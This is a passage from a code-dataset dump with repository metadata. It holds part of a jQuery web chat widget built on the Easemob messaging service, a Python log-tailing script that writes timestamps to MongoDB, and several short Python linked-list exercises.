xxim.getuserinfo = function (id) {\r\n var info = null;\r\n $(xxim.userlist).each(function (i, item) {\r\n if (item.subscription == 'both' || item.subscription == 'to') {\r\n if (item.name == id) info = item;\r\n }\r\n });\r\n return info;\r\n };\r\n //设置用户信息\r\n xxim.setuserinfo = function (id, info) {\r\n var $infobox = $('#layim_chatbox_info_' + id);\r\n if (!$infobox.length) return;\r\n $infobox.find('.layim_chatinfo_name').html(info.name);\r\n $infobox.find('.layim_chatinfo_face').attr('src', info.face);\r\n var 
$sex = $infobox.find('.layim_chatinfo_sex').hide();\r\n if (info.sex == 'M') $sex.css('color', '#4CAE4C').show();\r\n if (info.sex == 'F') $sex.css('color', '#FF808E').show();\r\n $infobox.find('.layim_chatinfo_intg').html(info.intg || 0);\r\n $infobox.find('.layim_chatinfo_phone').html(info.phone || '');\r\n $infobox.find('.layim_chatinfo_city').html((info.Province || '') + (info.city || '') + (info.district || ''));\r\n if (xxim.getuserinfo(id)) $infobox.find('.layim_chatinfo_deleteuser').show().siblings('.layim_chatinfo_adduser').hide();\r\n else $infobox.find('.layim_chatinfo_deleteuser').hide().siblings('.layim_chatinfo_adduser').show();\r\n };\r\n //缓存用户信息\r\n xxim.setinfo = function (info) {\r\n var chatuseritem = {\r\n name: info.MbrName,\r\n face: info.MbrPhoto,\r\n sex: info.Sex,\r\n intg: info.UseIntg,\r\n phone: info.Phone,\r\n province: info.Province,\r\n city: info.City,\r\n district: info.District\r\n };\r\n config.chatuser[info.MbrID] = chatuseritem;\r\n return chatuseritem;\r\n };\r\n //定位到某个聊天队列\r\n xxim.tabchat = function (param) {\r\n var node = xxim.node, log = {}, keys = param.type + param.id;\r\n xxim.nowchat = param;\r\n\r\n xxim.chatbox.find('#layim_user' + keys).addClass('layim_chatnow').siblings().removeClass('layim_chatnow');\r\n xxim.chatbox.find('#layim_area' + keys).addClass('layim_chatthis').siblings().removeClass('layim_chatthis');\r\n xxim.chatbox.find('#layim_group' + keys).addClass('layim_groupthis').siblings().removeClass('layim_groupthis');\r\n\r\n xxim.chatbox.find('.layim_face>img').attr('src', param.face).attr('class', 'layim_chatface_' + param.id);\r\n //xxim.chatbox.find('.layim_face, .layim_names').attr('href', param.href);\r\n xxim.chatbox.find('.layim_names').text(param.name).attr('class', 'layim_names layim_chatname_' + param.id);\r\n\r\n //xxim.chatbox.find('.layim_seechatlog').attr('href', config.chatlogurl + param.id);\r\n\r\n log.groups = xxim.chatbox.find('.layim_groups');\r\n if (param.type === 'group') {\r\n log.groups.show();\r\n } else {\r\n log.groups.hide();\r\n }\r\n $('#layim_write').focus();\r\n xxim.showusermsg(param.id, param.type);\r\n xxim.ischating = true;\r\n xxim.showcount(param.id);\r\n };\r\n xxim.getinfo = function (id, fn) {\r\n var info = config.chatuser[id];\r\n if (info) return info;\r\n else {\r\n if (id == 'admin') {\r\n info = { name: '物品在线助手', face: '/Files/Common/logo_80x80.png' };\r\n config.chatuser[id] = info;\r\n return info;\r\n }\r\n info = { name: id, face: '/Files/Shop/mbr-photo-default.png' };\r\n config.chatuser[id] = info;\r\n common.post('/Api/Shop/ShopMbrBLL/GetMbrChatInfo', { MbrID: id }, function (data) {\r\n var chatuseritem = xxim.setinfo(data.ResponseContent);\r\n if (xxim.node && xxim.node.list) {\r\n xxim.node.list.find('.layim_chatname_' + id).html(chatuseritem.name);\r\n xxim.node.list.find('.layim_chatface_' + id).attr('src', chatuseritem.face);\r\n }\r\n if (xxim.chatbox) {\r\n xxim.chatbox.find('.layim_chatname_' + id).html(chatuseritem.name);\r\n xxim.chatbox.find('.layim_chatface_' + id).attr('src', chatuseritem.face);\r\n }\r\n if (xxim.presencebox) {\r\n xxim.presencebox.find('.layim_chatname_' + id).html(chatuseritem.name);\r\n xxim.presencebox.find('.layim_chatface_' + id).attr('src', chatuseritem.face);\r\n }\r\n if (fn) fn(id, chatuseritem);\r\n }, null, { autologin: false, mask: false });\r\n return info\r\n }\r\n };\r\n xxim.showusermsg = function (id, type) {\r\n $(config.chatmsg[id]).each(function (i, item) {\r\n xxim.showmsg($.extend({\r\n time: item.time,\r\n name: 
item.from,\r\n face: config.user.face,\r\n content: item.data,\r\n type: type,\r\n id: id\r\n }, xxim.getinfo(id)));\r\n layim.easemob.conn.sendReceiptsMessage({ id: item.id });\r\n });\r\n config.chatmsg[id] = [];\r\n }\r\n xxim.showmsg = function (param, type) {\r\n var keys = param.type + param.id;\r\n var h = '<li class=\"' + (type === 'me' ? 'layim_chateme' : '') + '\">'\r\n + '<div class=\"layim_chatuser\">'\r\n + function () {\r\n if (type === 'me') {\r\n //return '<span class=\"layim_chattime\">' + param.time + '</span>'\r\n // + '<span class=\"layim_chatname\">' + param.name + '</span>'\r\n // + '<img src=\"' + param.face + '\" >';\r\n return '<img src=\"' + param.face + '\" >';\r\n } else {\r\n //return '<img src=\"' + param.face + '\" class=\"layim_chatface_' + param.id + '\">'\r\n // + '<span class=\"layim_chatname layim_chatname_' + param.id + '\">' + param.name + '</span>'\r\n // + '<span class=\"layim_chattime\">' + param.time + '</span>';\r\n return '<img src=\"' + param.face + '\" class=\"layim_chatface_' + param.id + '\">';\r\n }\r\n }()\r\n + '</div>'\r\n + '<div class=\"layim_chatsay\">' + param.content + '<em class=\"layim_zero\"></em></div>'\r\n + '</li>';\r\n var imarea = xxim.chatbox.find('#layim_area' + keys);\r\n\r\n var time = param.time ? param.time.substring(0, 16) : '';\r\n if (imarea[0].lasttime != time) {\r\n imarea[0].lasttime = time;\r\n imarea.append('<div class=\"layim_chatarea_time\"><span>' + time + '</span></div>');\r\n }\r\n\r\n imarea.append(h);\r\n imarea.scrollTop(imarea[0].scrollHeight);\r\n };\r\n //弹出聊天窗\r\n xxim.popchatbox = function (othis) {\r\n var node = xxim.node, dataId = othis.attr('data-id'), param = {\r\n id: dataId, //用户ID\r\n type: othis.attr('type'),\r\n name: othis.find('.xxim_onename').text(), //用户名\r\n face: othis.find('.xxim_oneface').attr('src'), //用户头像\r\n href: 'profile.html?user=' + dataId //用户主页\r\n }, key = param.type + dataId;\r\n if (!config.chating[key]) {\r\n xxim.popchat(param);\r\n config.chatings++;\r\n } else {\r\n xxim.tabchat(param);\r\n }\r\n config.chating[key] = param;\r\n\r\n var chatbox = $('#layim_chatbox');\r\n if (chatbox[0]) {\r\n //node.layimMin.hide();\r\n node.layimMin.parent().addClass('xxim_bottom_3');\r\n chatbox.parents('.layui-layerim').show();\r\n }\r\n\r\n };\r\n xxim.setpresence = function (info) {\r\n if (!xxim.presencebox) return;\r\n var hid = 'layim_presencebox_item_' + info.from;\r\n var hitem = xxim.presencebox.find('#' + hid);\r\n if (hitem.length) hitem.remove();\r\n var param = $.extend({ from: info.from }, xxim.getinfo(info.from));\r\n var h = '<div class=\"layim_presencebox_item\" id=\"' + hid + '\"><div class=\"layim_presencebox_item_left\" onclick=\"layim.easemob.xxim.showuserinfo(\\'' + param.from + '\\')\"><img class=\"layim_chatface_' + param.from + '\" src=\"' + param.face + '\"><div class=\"layim_chatname_' + param.from + '\">' + param.name + '</div><div>' + (info.status || '申请加为好友') + '</div></div><div class=\"layim_presencebox_item_right\"><div class=\"layim_presencebox_accept_btn\" onclick=\"layim.easemob.xxim.presenceaccept(\\'' + param.from + '\\')\">接受</div><div class=\"layim_presencebox_reject_btn\" onclick=\"layim.easemob.xxim.presencereject(\\'' + param.from + '\\')\">拒绝</div></div></div>';\r\n xxim.presencebox.find('.layim_presencebox_content').append(h);\r\n };\r\n xxim.presenceaccept = function (id) {\r\n $('#layim_presencebox_item_' + id + ' .layim_presencebox_item_right').html('已接受');\r\n layim.easemob.conn.subscribed({\r\n to: id,\r\n message: 
\"[resp:true]\"\r\n });\r\n layim.easemob.conn.subscribe({\r\n to: id,\r\n message: \"[resp:true]\"\r\n });\r\n };\r\n xxim.presencereject = function (id) {\r\n $('#layim_presencebox_item_' + id + ' .layim_presencebox_item_right').html('已拒绝');\r\n layim.easemob.conn.unsubscribed({\r\n to: id\r\n });\r\n };\r\n //弹出新的联系人\r\n xxim.poppresencebox = function () {\r\n if (xxim.presencebox) return xxim.settop(xxim.presencebox.parent().parent());\r\n var log = {};\r\n log.success = function (layero) {\r\n xxim.presencebox = layero.find('#layim_presencebox');\r\n xxim.presencebox.find('.layim_presencebox_search_keyword').on('keyup', function (e) {\r\n if (e.which == 13) xxim.searchuser();\r\n });\r\n $(config.presences).each(function (i, item) {\r\n xxim.setpresence(item);\r\n });\r\n config.presences = [];\r\n xxim.showcount();\r\n };\r\n log.html = '<div class=\"layim_presencebox\" id=\"layim_presencebox\">'\r\n + ' <div class=\"layim_presencebox_search\">'\r\n + ' <input class=\"layui-layer-text layim_presencebox_search_keyword\" type=\"text\" placeholder=\"昵称/手机号/邮箱\" />'\r\n + ' <div class=\"layim_presencebox_search_btn\" onclick=\"layim.easemob.xxim.searchuser()\">查找</div>'\r\n + ' </div>'\r\n + ' <div class=\"layim_presencebox_content\">'\r\n + ' </div>'\r\n + '</div>';\r\n layer.open({\r\n type: 1,\r\n title: '新的联系人',\r\n shade: false,\r\n moveType: 1,\r\n skin: 'layui-layerim',\r\n area: ['600px', '400px'],\r\n zIndex: layer.zIndex,\r\n offset: [(($(window).height() - 400) / 2) + 'px', ''],\r\n content: log.html,\r\n cancel: function (index) {\r\n xxim.presencebox = null;\r\n },\r\n success: function (layero) {\r\n log.success(layero);\r\n }\r\n });\r\n };\r\n //请求群员\r\n xxim.getGroups = function (param) {\r\n var keys = param.type + param.id, str = '',\r\n groupss = xxim.chatbox.find('#layim_group' + keys);\r\n groupss.addClass('loading');\r\n config.json(config.api.groups, {}, function (datas) {\r\n if (datas.status === 1) {\r\n var ii = 0, lens = datas.data.length;\r\n if (lens > 0) {\r\n for (; ii < lens; ii++) {\r\n str += '<li data-id=\"' + datas.data[ii].id + '\" type=\"one\"><img src=\"' + datas.data[ii].face + '\" class=\"xxim_oneface\"><span class=\"xxim_onename\">' + datas.data[ii].name + '</span></li>';\r\n }\r\n } else {\r\n str = '<li class=\"layim_errors\">没有群员</li>';\r\n }\r\n\r\n } else {\r\n str = '<li class=\"layim_errors\">' + datas.msg + '</li>';\r\n }\r\n groupss.removeClass('loading');\r\n groupss.html(str);\r\n }, function () {\r\n groupss.removeClass('loading');\r\n groupss.html('<li class=\"layim_errors\">请求异常</li>');\r\n });\r\n };\r\n\r\n //消息传输\r\n xxim.transmit = function () {\r\n var node = xxim.node, log = {};\r\n node.sendbtn = $('#layim_sendbtn');\r\n node.imwrite = $('#layim_write');\r\n //发送\r\n log.send = function () {\r\n var data = {\r\n content: node.imwrite.val(),\r\n id: xxim.nowchat.id,\r\n sign_key: '', //密匙\r\n _: +new Date\r\n };\r\n\r\n if (data.content.replace(/\\s/g, '') === '') {\r\n layer.tips('说点啥呗!', '#layim_write', 2);\r\n node.imwrite.focus();\r\n } else {\r\n var time = xxim.gettime();\r\n layim.easemob.conn.sendTextMessage({ to: data.id, msg: data.content, type: \"chat\", ext: { time: time } });\r\n xxim.showmsg({\r\n id: data.id,\r\n type: xxim.nowchat.type,\r\n time: time,\r\n name: config.user.name,\r\n face: config.user.face,\r\n content: data.content\r\n }, 'me');\r\n node.imwrite.val('').focus();\r\n }\r\n };\r\n node.sendbtn.on('click', log.send);\r\n node.imwrite.keyup(function (e) {\r\n if (e.keyCode === 13) {\r\n 
log.send();\r\n }\r\n });\r\n };\r\n\r\n //事件\r\n xxim.event = function () {\r\n var node = xxim.node;\r\n //主界面tab\r\n node.tabs.eq(0).addClass('xxim_tabnow');\r\n node.tabs.on('click', function () {\r\n var othis = $(this), index = othis.index();\r\n xxim.tabs(index);\r\n });\r\n //列表展收\r\n node.list.on('click', 'h5', function () {\r\n var othis = $(this), chat = othis.siblings('.xxim_chatlist'), parentss = othis.find(\"i\");\r\n if (parentss.hasClass('fa-caret-down')) {\r\n chat.hide();\r\n parentss.attr('class', 'fa fa-caret-right');\r\n } else {\r\n chat.show();\r\n parentss.attr('class', 'fa fa-caret-down');\r\n }\r\n });\r\n node.online.on('click', function (e) {\r\n if (node.layimMin.parent().hasClass('xxim_bottom_offline')) return;\r\n xxim.tabs(2);\r\n if (xxim.layimNode.attr('state') == '1') xxim.expend();\r\n });\r\n node.xximon.on('click', xxim.expend);\r\n node.xximHide.on('click', xxim.expend);\r\n node.rconnect.on('click', function () {\r\n xxim.rconnect();\r\n });\r\n //搜索\r\n node.xximSearch.keyup(function () {\r\n var val = $(this).val().replace(/\\s/g, '');\r\n if (val !== '') {\r\n node.searchMian.show();\r\n node.closeSearch.show();\r\n //此处的搜索ajax参考xxim.getDates\r\n node.list.eq(3).html('<li class=\"xxim_errormsg\">没有符合条件的结果</li>');\r\n } else {\r\n node.searchMian.hide();\r\n node.closeSearch.hide();\r\n }\r\n });\r\n node.closeSearch.on('click', function () {\r\n $(this).hide();\r\n node.searchMian.hide();\r\n node.xximSearch.val('').focus();\r\n });\r\n //弹出聊天窗\r\n config.chatings = 0;\r\n node.list.on('click', '.xxim_childnode', function () {\r\n var othis = $(this);\r\n xxim.popchatbox(othis);\r\n });\r\n //弹出新的联系人\r\n node.list.on('click', '.xxim_addnode', function () {\r\n xxim.poppresencebox();\r\n });\r\n //点击最小化栏\r\n node.layimMin.on('click', function () {\r\n //$(this).hide();\r\n $(this).parent().addClass('xxim_bottom_3');\r\n $('#layim_chatbox').parents('.layui-layerim').show();\r\n });\r\n //document事件\r\n dom[1].on('click', function () {\r\n node.setonline.hide();\r\n $('#layim_sendtype').hide();\r\n });\r\n };\r\n xxim.gettime = function () {\r\n //var date = new Date();\r\n //var time = date.getHours() + \":\" + date.getMinutes();\r\n //return time;\r\n return new Date().ToFormat('yyyy/MM/dd hh:mm:ss');\r\n //return new Date().toString();\r\n };\r\n xxim.gochat = function () {\r\n var message = xxim.forchat;\r\n if (!message) return;\r\n $.extend(message, { time: xxim.gettime() });\r\n var msg = config.chatmsg[message.from];\r\n if (!msg) {\r\n msg = config.chatmsg[message.from] = [];\r\n var h = '<li data-id=\"' + message.from + '\" class=\"xxim_childnode xxim_childnode_' + message.from + '\" type=\"one\"><img src=\"' + message.face + '\" class=\"xxim_oneface layim_chatface_' + message.from + '\"><span class=\"xxim_onename layim_chatname_' + message.from + '\">' + message.name + '</span><em class=\"xxim_time\">' + (message.time ? 
message.time.substring(5, 10) : '') + '</em><i class=\"xxim_chatcount xxim_chatcount_' + message.from + '\">1</i></li>';\r\n xxim.node.list.eq(2).find('.xxim_chatlist').prepend(h);\r\n }\r\n var childnodes = xxim.node.list.find('.xxim_childnode_' + message.from);\r\n if (childnodes.length) xxim.popchatbox(childnodes.eq(0));\r\n xxim.forchat = null;\r\n }\r\n xxim.inchat = function (message) {\r\n xxim.forchat = message;\r\n if (layim.easemob.conn.isOpened()) xxim.gochat();\r\n else xxim.rconnect();\r\n };\r\n xxim.showuser = function (list) {\r\n xxim.userlist = list;\r\n var h = '';\r\n h += '<li class=\"xxim_addnode\" id=\"xxim_addnode\"><span class=\"xxim_addnode_face\"><i class=\"fa fa-user\"></i><i class=\"fa fa-plus-circle\"></i></span><span class=\"\">新的联系人</span><i class=\"xxim_chatcount\" style=\"' + (config.presences.length ? 'display:block;' : '') + '\">' + config.presences.length + '</i></li>';\r\n $(list).each(function (i, item) {\r\n if (item.subscription == 'both' || item.subscription == 'to') {\r\n var message = $.extend({ from: item.name }, xxim.getinfo(item.name));\r\n h += '<li data-id=\"' + message.from + '\" class=\"xxim_childnode xxim_childnode_' + message.from + '\" type=\"one\"><img src=\"' + message.face + '\" class=\"xxim_oneface layim_chatface_' + message.from + '\"><span class=\"xxim_onename layim_chatname_' + message.from + '\">' + message.name + '</span><i class=\"xxim_chatcount xxim_chatcount_' + message.from + '\"></i></li>';\r\n }\r\n });\r\n xxim.node.list.eq(0).find('.xxim_chatlist').html(h);\r\n };\r\n xxim.searchuser = function () {\r\n if (!xxim.presencebox) return;\r\n var keyword = xxim.presencebox.find('.layim_presencebox_search_keyword').val();\r\n if (!keyword) return;\r\n common.post('/Api/Shop/ShopMbrBLL/GetMbrChatInfo', { KeyWord: keyword }, function (data) {\r\n if (!data.ResponseContent) return layer.msg('用户不存在!', { zIndex: layer.zIndex });;\r\n xxim.setinfo(data.ResponseContent);\r\n xxim.showuserinfo(data.ResponseContent.MbrID);\r\n });\r\n };\r\n xxim.showpresence = function (e) {\r\n if (e.type === 'subscribe') {\r\n //若e.status中含有[resp:true],则表示为对方同意好友后反向添加自己为好友的消息,demo中发现此类消息,默认同意操作,完成双方互为好友;如果不含有[resp:true],则表示为正常的对方请求添加自己为好友的申请消息。\r\n if (e.status) {\r\n if (e.status.indexOf('resp:true') > -1) {\r\n layim.easemob.conn.subscribed({\r\n to: e.from,\r\n message: \"[resp:true]\"\r\n });\r\n return;\r\n }\r\n }\r\n if (!xxim.presencebox) {\r\n config.presences.push(e);\r\n xxim.showcount();\r\n }\r\n else xxim.setpresence(e);\r\n }\r\n\r\n //(发送者允许接收者接收他们的出席信息),即别人同意你加他为好友\r\n if (e.type === 'subscribed') {\r\n\r\n }\r\n\r\n //unsubscribe(发送者取消订阅另一个实体的出席信息),即删除现有好友\r\n //unsubscribed(订阅者的请求被拒绝或以前的订阅被取消),即对方单向的删除了好友\r\n if (e.type === 'unsubscribe' || e.type === 'unsubscribed') {\r\n layim.easemob.conn.removeRoster({\r\n to: e.from,\r\n groups: ['default'],\r\n success: function () {\r\n layim.easemob.conn.unsubscribed({\r\n to: e.from\r\n });\r\n }\r\n });\r\n }\r\n };\r\n xxim.showhistory = function (message) {\r\n $.extend(message, xxim.getinfo(message.from));\r\n var msg = config.chatmsg[message.from];\r\n if (!msg) {\r\n msg = config.chatmsg[message.from] = [message];\r\n var h = '<li data-id=\"' + message.from + '\" class=\"xxim_childnode xxim_childnode_' + message.from + '\" type=\"one\"><img src=\"' + message.face + '\" class=\"xxim_oneface layim_chatface_' + message.from + '\"><span class=\"xxim_onename layim_chatname_' + message.from + '\">' + message.name + '</span><em class=\"xxim_time\">' + (message.time ? 
message.time.substring(5, 10) : '') + '</em><i class=\"xxim_chatcount xxim_chatcount_' + message.from + '\"></i></li>';\r\n xxim.node.list.eq(2).find('.xxim_chatlist').prepend(h);\r\n }\r\n else {\r\n msg.push(message);\r\n }\r\n if (xxim.ischating && xxim.nowchat && xxim.nowchat.id == message.from) xxim.showusermsg(message.from, 'one');\r\n xxim.showcount(message.from);\r\n };\r\n xxim.showcount = function (id) {\r\n if (id) {\r\n var msg = config.chatmsg[id];\r\n if (!msg) return;\r\n var $chatcount = xxim.node.list.find('.xxim_chatcount_' + id);\r\n if (msg.length) $chatcount.html(msg.length).show();\r\n else $chatcount.hide().html(msg.length);\r\n }\r\n var pcount = config.presences ? config.presences.length : 0;\r\n if (pcount) xxim.node.list.find('#xxim_addnode .xxim_chatcount').html(pcount).show();\r\n else xxim.node.list.find('#xxim_addnode .xxim_chatcount').html(pcount).hide();\r\n var count = pcount;\r\n for (var i in config.chatmsg) {\r\n count += config.chatmsg[i].length;\r\n }\r\n var $count = xxim.node.online.children('.xxim_chatcount');\r\n if (layim.easemob.showtip) layim.easemob.showtip(count);\r\n else {\r\n if (count) $count.html(count);\r\n else $count.html('');\r\n }\r\n };\r\n //渲染骨架\r\n xxim.view = (function () {\r\n var xximNode = xxim.layimNode = $('<div id=\"xximmm\" class=\"xxim_main\">'\r\n + '<div class=\"xxim_top\" id=\"xxim_top\">'\r\n + ' <div class=\"xxim_search\"><i class=\"fa fa-search\"></i><input id=\"xxim_searchkey\" /><span id=\"xxim_closesearch\">×</span></div>'\r\n + ' <div class=\"xxim_tabs\" id=\"xxim_tabs\"><span class=\"xxim_tabfriend\" title=\"好友\"><i class=\"fa fa-user\"></i></span><span class=\"xxim_tabgroup\" title=\"群组\"><i class=\"fa fa-users\"></i></span><span class=\"xxim_latechat\" title=\"最近聊天\"><i class=\"fa fa-clock-o\"></i></span></div>'\r\n + ' <ul class=\"xxim_list loading\"><li class=\"xxim_liston\"><ul class=\"xxim_chatlist\"></ul></li></ul>'\r\n + ' <ul class=\"xxim_list loading\"></ul>'\r\n + ' <ul class=\"xxim_list loading\"><li class=\"xxim_liston\"><ul class=\"xxim_chatlist\"></ul></li></ul>'\r\n + ' <ul class=\"xxim_list xxim_searchmain\" id=\"xxim_searchmain\"></ul>'\r\n + '</div>'\r\n + '<ul class=\"xxim_bottom xxim_bottom_3 xxim_bottom_offline\" id=\"xxim_bottom\">'\r\n + '<li class=\"xxim_online xxim_offline\" id=\"xxim_online\" title=\"状态\">'\r\n + '<i class=\"xxim_chatcount\"></i><span id=\"xxim_onlinetex\">离线</span>'\r\n + '</li>'\r\n + '<li class=\"xxim_mymsg\" id=\"xxim_mymsg\" title=\"对话窗口\"><i class=\"fa fa-comments\"></i></li>'\r\n + '<li class=\"xxim_seter\" id=\"xxim_seter\" title=\"设置\">'\r\n + '<i class=\"fa fa-gear\"></i>'\r\n + '<div>'\r\n\r\n + '</div>'\r\n + '</li>'\r\n + '<li class=\"xxim_rconnect loading\" id=\"xxim_rconnect\"></li>'\r\n + '<li class=\"xxim_hide\" id=\"xxim_hide\" title=\"显示/隐藏面板\"><i class=\"fa fa-exchange\"></i></li>'\r\n + '</ul>'\r\n + '</div>');\r\n dom[3].append(xximNode);\r\n\r\n xxim.renode();\r\n xxim.event();\r\n xxim.layinit();\r\n }());\r\n}"
},
{
"alpha_fraction": 0.5485029816627502,
"alphanum_fraction": 0.5646706819534302,
"avg_line_length": 27.775861740112305,
"blob_id": "64e496160bbe218ea2ed7f3ce5e8987f6b72363c",
"content_id": "7d7705780c6a4d9ef8b47dc1c785c5adf2406c6b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1828,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 58,
"path": "/terminal/getterminalfield.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n1、读取文件\n2、正则表达式提取信息\n3、生成字段插入数据库\ncreate by swm\n2018/1/15\n\"\"\"\nimport os\nimport re\nimport time\nimport datetime\n\nfrom terminal.allconfig import conf\nfrom terminal.mongooptions import insertintoterminal\n\nclass ANALYSIS:\n\n def getallthefilename(self, directorypath):\n allfilenames = []\n for root, dirs, files in os.walk(directorypath):\n for filename in files:\n # print(filename)\n allfilenames.append(filename)\n return allfilenames\n\n # 跟踪文件,定位为文件最后一行\n def follw(self, thefile):\n thefile.seek(0, 2) # Go to the end of the file\n while True:\n line = thefile.readline()\n if not line:\n time.sleep(0.1)\n continue\n yield line\n\n def storeinformation(self, infotime):\n # 创建字典暂存信息\n info = {}\n info['logtime'] = infotime\n insertintoterminal(info)\n\n def startcollectinformation(self):\n # 信号强度\n # 数据包\n # 匹配当前时间\n re_time = re.compile(r'(\\S{3}) (\\d{2})\\, (\\d{4}) (\\d{2})\\:(\\d{2})\\:(\\d{2})')\n logfile = open(conf['terminal'], \"r\")\n loglines = self.follw(logfile)\n for line in loglines:\n logtime = re_time.match(line)\n # datetime\n origintime = datetime.datetime(int(logtime.group(3)), conf[logtime.group(1)], int(logtime.group(2)), int(logtime.group(4)),\n int(logtime.group(5)), int(logtime.group(6)))\n # 存入数据库采用unix time的整形\n unixtime = int(time.mktime(origintime.timetuple()))\n # 最后调用存储的方法\n self.storeinformation(unixtime)\n\n"
}
] | 41 |
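Note: the `follw` generator in `terminal/getterminalfield.py` above is the classic tail-follow pattern: seek to the end of the file, then poll for newly appended lines. A minimal standalone sketch of the same pattern (the log path and the `print` consumer are placeholders; the repo instead reads `conf['terminal']` and inserts into MongoDB):

import time

def follow(fh, poll_interval=0.1):
    # Seek to EOF first, as follw() does, so only new lines are yielded.
    fh.seek(0, 2)
    while True:
        line = fh.readline()
        if not line:
            time.sleep(poll_interval)  # nothing new yet; poll again
            continue
        yield line

# Hypothetical usage:
# with open("app.log") as fh:
#     for line in follow(fh):
#         print(line, end="")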
ANKITPODDER2000/LinkedList | https://github.com/ANKITPODDER2000/LinkedList | e9e22b7dff42d5633aa473edae2d1a3386d2650e | 06077454aecf59937fe028caf814443c617d83f7 | d4be7e60a2ce8bbcdd9f9fa2b05f15410e5c8003 | refs/heads/main | 2023-02-17T06:15:12.230477 | 2021-01-10T13:44:06 | 2021-01-10T13:44:06 | 328,392,805 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5343137383460999,
"alphanum_fraction": 0.5571895241737366,
"avg_line_length": 20.10344886779785,
"blob_id": "20ea06084ab3b81f394b88a20fd22dc59475dfea",
"content_id": "cf22bbbd538c18dcee0464696e332aa6a3276a62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 612,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 29,
"path": "/43_linked_list_rotate.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef rotate(l1 , k):\n k = k % l1.length()\n head = l1.head\n if k == 0:\n return\n c = 1\n temp_head = head\n while c<k:\n head = head.next\n c += 1\n temp = head.next\n temp1 = temp\n while temp.next:\n temp = temp.next\n head.next = temp.next\n temp.next = temp_head\n l1.head = temp1\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n k = int(input(\"Enter the value of k : \"))\n l1.display()\n rotate(l1 , k)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
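The `rotate` in `43_linked_list_rotate.py` performs a left rotation: after `k %= length`, the (k+1)-th node becomes the new head and the old prefix is spliced onto the tail. A quick cross-check of the same semantics on a plain Python list (a sketch, not the repo's API):

def rotate_left(vals, k):
    # Same left-rotation the linked-list version performs in one pass.
    if not vals:
        return vals
    k %= len(vals)
    return vals[k:] + vals[:k]

assert rotate_left([1, 2, 3, 4, 5], 2) == [3, 4, 5, 1, 2]
assert rotate_left([1, 2, 3], 0) == [1, 2, 3]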
{
"alpha_fraction": 0.600382387638092,
"alphanum_fraction": 0.609942615032196,
"avg_line_length": 28.05555534362793,
"blob_id": "981562e2bca308518c0af9200ae94a74e9a0d994",
"content_id": "7069a23876a5244786c8a1f46fb5d8d73276003e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/12_loop_detection.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass LinkedListMod(LinkedList):\n def detect_loop(self):\n HASH = {}\n temp = self.head\n while temp and temp not in HASH:\n HASH[temp] = True\n temp = temp.next\n return not temp==None\ndef main():\n l1 = LinkedListMod()\n CreateLinkedList(l1)\n tail = l1.get_tail()\n tail.next = l1.head.next.next\n print(\"Is their any loop : \",l1.detect_loop())\nif __name__ == \"__main__\":\n main()\n"
},
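`detect_loop` in `12_loop_detection.py` spends O(n) extra memory on a hash of visited nodes. Floyd's tortoise-and-hare detects the same cycles in O(1) space; a self-contained sketch with a minimal stand-in `Node` (the repo's real node type lives in its `LinkedList` module, so this class is an assumption):

class Node:
    def __init__(self, val, nxt=None):
        self.val, self.next = val, nxt

def has_cycle(head):
    slow = fast = head
    while fast and fast.next:
        slow, fast = slow.next, fast.next.next
        if slow is fast:  # the pointers can only meet inside a cycle
            return True
    return False

# Build 1 -> 2 -> 3 -> back to 2, mirroring the tail-to-node loop in main().
tail = Node(3)
head = Node(1, Node(2, tail))
tail.next = head.next
assert has_cycle(head)
tail.next = None
assert not has_cycle(head)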
{
"alpha_fraction": 0.5394737124443054,
"alphanum_fraction": 0.5582706928253174,
"avg_line_length": 21.16666603088379,
"blob_id": "9b8abb751b0e816d3d9048b203c82ea43b9e363a",
"content_id": "78fb22f3574ccd5b02dc12d0436d1bbadccfe4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 24,
"path": "/35_middle_to_head.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef middle_to_head(head):\n prev = None\n mid = head\n temp_head = head\n c = 0\n while head:\n if c & 1 == 1:\n prev = mid\n mid = mid.next\n head = head.next\n c += 1\n prev.next = mid.next\n mid.next = temp_head\n return mid\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = middle_to_head(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5799086689949036,
"alphanum_fraction": 0.5913242101669312,
"avg_line_length": 26.4375,
"blob_id": "d374169f2f22d64196612ad1f93648db9345a983",
"content_id": "dea2879769eb32797e35cdc3794443ca9e9d96a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 16,
"path": "/26_occurence.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef count(head , num):\n c = 0\n while head:\n if head.val == num:\n c += 1\n head = head.next\n return c\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n num = int(input(\"Enter the number : \"))\n print(\"Occurence of %d in the linkedlist is = %d\"%(num , count(l1.head , num)))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6482758522033691,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 28.100000381469727,
